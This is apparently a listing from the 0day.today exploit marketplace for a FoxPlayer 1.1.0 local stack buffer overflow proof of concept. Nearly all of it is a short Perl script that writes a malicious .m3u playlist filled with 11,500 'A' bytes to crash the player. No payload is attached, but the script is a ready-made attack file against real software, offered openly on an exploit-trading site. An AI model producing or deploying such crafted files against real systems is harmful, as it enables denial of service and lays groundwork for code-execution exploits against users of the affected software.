[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FoxPlayer 1.1.0 (m3u File) Local Buffer Overflow PoC

Author
opt!x hacker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6960
Category
dos / poc
Date add
06-08-2009
Platform
unsorted
====================================================
FoxPlayer 1.1.0 (m3u File) Local Buffer Overflow PoC
====================================================


#!/usr/bin/perl
# FoxPlayer 1.1.0 (m3u) local stack overlow POC
#finded by opt!x hacker  
#download : http://files.brothersoft.com/regnow/fox-player-setup.exe
my $header="#M3u";
my $crash="A" x 11500;
my $poc=$crash;
open(myfile,'>>AIDI.m3u');
print myfile $poc;



#  0day.today [2024-10-05]  #